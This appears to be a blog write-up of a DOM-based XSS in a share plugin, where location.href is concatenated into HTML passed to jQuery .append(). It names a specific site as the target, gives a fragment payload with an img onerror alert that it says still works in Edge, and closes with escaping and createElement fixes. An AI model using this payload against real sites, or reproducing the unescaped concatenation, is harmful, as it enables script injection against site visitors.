I recently found an exploitable DOM-based XSS vulnerability caused by a vulnerable JavaScript dependency (jQuery).
Okay, let's look at an example of the vulnerable code.
// Vulnerable as found: window.location.href is concatenated into an HTML string
// and handed to jQuery's .append(), which parses the string as HTML.
function sfsi_mobile_jake_share(url) {
  if (jQuery('.sfsi_jake_follow_overlay').length == 0) {
    jQuery('body').append("<div class='sfsi_jake_follow_overlay sfsi_overlay show'><div class='sfsi_inner_display'><a class='close_btn' href='' onclick=\"event.preventDefault();close_overlay(\'.sfsi_jake_follow_overlay\')\" >×</a><div style='width:95%; min-height:80%;background-color:#fff;margin:0 auto;margin:30% auto;padding: 20px 0;'><div style='width:90%;margin: 0 auto;'><input type='text' value='" + window.location.href + "' style='width:100%;padding:7px 0;text-align:center' /></div><div style='width:80%;margin:10px auto 0 auto'><div class='sfsi_upload_butt_container' ><button onclick='sfsi_copy_text_parent_input(event)' class='upload_butt' >Copy</button></div><div class='sfsi_upload_butt_container' ><a href='weixin://' class='upload_butt'>Open This Element</a></div></div></div></div>");
  }
}
As you can see, this code concatenates window.location.href into an HTML string without any encoding and passes the result to jQuery's .append(), which parses it as HTML. The URL lands inside a single-quoted value='...' attribute, so a single quote in the URL closes the attribute and everything after it is treated as markup. Because the fragment (#...) is part of location.href but is never sent to the server, the payload is invisible to server-side filtering and never appears in server logs.
Let’s exploit it!
First, visit a vulnerable website that uses JavaScript like the code shown above.
Example: http://cyberscap.com/
Then append #'><img src=x onerror=alert(document.domain)> to the URL.
After that, the URL of the vulnerable website should look like this: http://cyberscap.com/#'><img src=x onerror=alert(document.domain)>
But this no longer works in browsers like Chrome, because Chrome percent-encodes characters such as ', < and > in the URL fragment before exposing them through location.href, so the payload reaches the attribute as %27%3E%3Cimg... and never breaks out of it. Anyhow, it's still exploitable on Edge, etc.
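The following is an added example (my own code, not the plugin's) that models the string-building step above under Node, without jQuery: the vulnerable concatenation, an attribute-escaped version, and an approximation of the fragment percent-encoding Chrome applies before the string is built. The function names and the constructed victim URL are mine, and encodeFragmentLikeChrome is an assumption about Chrome's behaviour (percent-encoding of space, ", <, >, backtick and '), not a copy of the browser's code.

```javascript
// Added example (not the plugin's code). Models how the overlay HTML string is
// built from window.location.href and why a fragment payload breaks out of the
// single-quoted value='...' attribute.

// Constructed victim URL: the payload sits in the fragment, so it is never sent
// to the server and only exists in the browser's location.href.
const PAYLOAD = "'><img src=x onerror=alert(document.domain)>";
const VICTIM_URL = "http://cyberscap.com/#" + PAYLOAD;

// Vulnerable builder: the same concatenation pattern as the original code.
// The sink in the plugin is jQuery's .append(), which parses this as HTML.
function buildOverlayVulnerable(href) {
  return "<input type='text' value='" + href + "' style='width:100%' />";
}

// Fix: encode for the HTML attribute context before concatenating. Covers
// both quote characters so it is safe in a single- or double-quoted attribute.
function escapeHtmlAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function buildOverlayEscaped(href) {
  return "<input type='text' value='" + escapeHtmlAttr(href) + "' style='width:100%' />";
}

// Assumption: an approximation of what Chrome does to the fragment before
// exposing it via location.href. Percent-encodes space, ", <, >, ` and '.
// This is why the same payload fails in Chrome but not in browsers that leave
// the fragment untouched.
function encodeFragmentLikeChrome(url) {
  const i = url.indexOf("#");
  if (i < 0) return url;
  const frag = url.slice(i + 1).replace(/[ "<>`']/g,
    (c) => "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0"));
  return url.slice(0, i + 1) + frag;
}

// Crude check for the breakout: did an <img ... onerror= tag end up in the
// markup as a real tag (rather than as encoded text inside the attribute)?
function hasInjectedTag(html) {
  return /<img\b[^>]*onerror=/i.test(html);
}

// Raw URL into the vulnerable builder: the quote closes value='...' and the
// <img> becomes live markup.
const exploitable = hasInjectedTag(buildOverlayVulnerable(VICTIM_URL));
// Escaped builder: the quote and angle brackets stay inside the attribute.
const fixed = hasInjectedTag(buildOverlayEscaped(VICTIM_URL));
// Vulnerable builder, but with Chrome-style fragment encoding applied first:
// the browser, not the plugin, is what blocks the attack here.
const chromeBlocked = hasInjectedTag(buildOverlayVulnerable(encodeFragmentLikeChrome(VICTIM_URL)));

console.log({ exploitable, fixed, chromeBlocked });
```

In the real page the cleanest fix is not to build HTML from strings at all: create the input with document.createElement and assign input.value = window.location.href, so the URL is only ever a property value and is never parsed as markup. Note that relying on the browser's fragment encoding, as Chrome's behaviour shows, is not a fix; the same plugin remained exploitable in browsers that left the fragment as typed.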